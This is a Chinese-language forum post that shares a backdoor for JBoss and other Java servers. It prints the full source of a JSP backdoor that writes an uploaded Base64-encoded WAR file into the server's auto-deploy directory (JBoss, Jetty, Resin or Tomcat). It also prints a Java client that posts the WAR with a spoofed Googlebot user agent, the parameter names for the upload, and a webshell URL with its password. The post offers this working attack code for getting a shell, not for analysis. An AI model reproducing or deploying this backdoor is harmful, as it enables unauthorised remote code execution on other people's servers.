社区发现有人发了一个Jboss的自动部署war的后门求此后门的利用方法
挺聪明的Server一般都提供了自动部署服务,也就是说只需要把war包放到默认能够自动部署的目录就行了。

POST提交:http://xxx.com/xxx.jsp
参数:
pUBYyDsT=war文件的Basr64编码&oAEICWIo=Test
然后请求http://xxx.com/Test就getshell了。Test是war文件的项目名。

只需简单的改改getProperty的属性值就能够通用到Tomcat等Server.

客户端工具:
Upload_War_后门.jar
iswin.war

2014010719302219994


源码:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
String war = jTextField3.getText();
if (war!= null ){
try {
FileInputStream fis = new FileInputStream( new File(war));
byte [] b = new byte [ 1024 ];
int n = 0 ;
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while ((n=fis.read(b))!=- 1 ){
baos.write(b, 0 ,n);
}
String content = new BASE64Encoder().encode(baos.toByteArray());
fis.close();
Map<String,String> map = new HashMap<String, String>();
map.put( "oAEICWIo" , jTextField2.getText());
map.put( "pUBYyDsT" , content);
Jsoup.connect(jTextField1.getText()).data(map).userAgent( "Googlebot/2.1 (+http://www.googlebot.com/bot.html" ).timeout( 30000 ).post();
jTextArea1.setText( "请求成功..." );
} catch (Exception e) {
jTextArea1.setText(e.toString());
}
}
}
private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {    
int result = 0 ;  
String path = null ;
JFileChooser fileChooser = new JFileChooser();  
FileSystemView fsv = FileSystemView.getFileSystemView();
fileChooser.setCurrentDirectory(fsv.getHomeDirectory());  
fileChooser.setDialogTitle( "请选择war文件." );  
fileChooser.setApproveButtonText( "确定" );  
fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY);  
result = fileChooser.showOpenDialog(fileChooser);  
if (JFileChooser.APPROVE_OPTION == result) {  
path=fileChooser.getSelectedFile().getPath();
}
jTextField3.setText(path);
}

修改后的z7y.jsp后门:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<% @page import = "java.io.*,java.util.*,sun.misc.BASE64Decoder" %>
<%!
String getServer(HttpServletRequest request,String name){
if (name.indexOf( "jboss" )!=- 1 ){
return System.getProperty( "jboss.server.home.dir" )+ "/deploy/" ;
} else if (name.indexOf( "jetty" )!=- 1 ){
return System.getProperty( "jetty.home" )+ "/webapps/" ;
} else if (name.indexOf( "resin" )!=- 1 ){
return System.getProperty( "resin.home" )+ "/webapps/" ;
}
return System.getProperty( "catalina.home" )+ "/webapps/" ;
}
%>
<%
String PJdpj = request.getParameter( "pUBYyDsT" );
if (PJdpj!= null ) {
try {
String RSVw = getServer(request, application.getServerInfo().toLowerCase()).replaceAll( "\\\\" , "/" )+request.getParameter( "oAEICWIo" )+ ".war" ;
FileOutputStream twkH = new FileOutputStream(RSVw);
twkH.write( new BASE64Decoder().decodeBuffer(PJdpj));
twkH.close();
String dhkDS = RSVw+ ".war" ;
new File(dhkDS).delete();
} catch (Exception e) {
}
}
%>

请求:http://localhost:8080/iswin/index.jsp 密码:023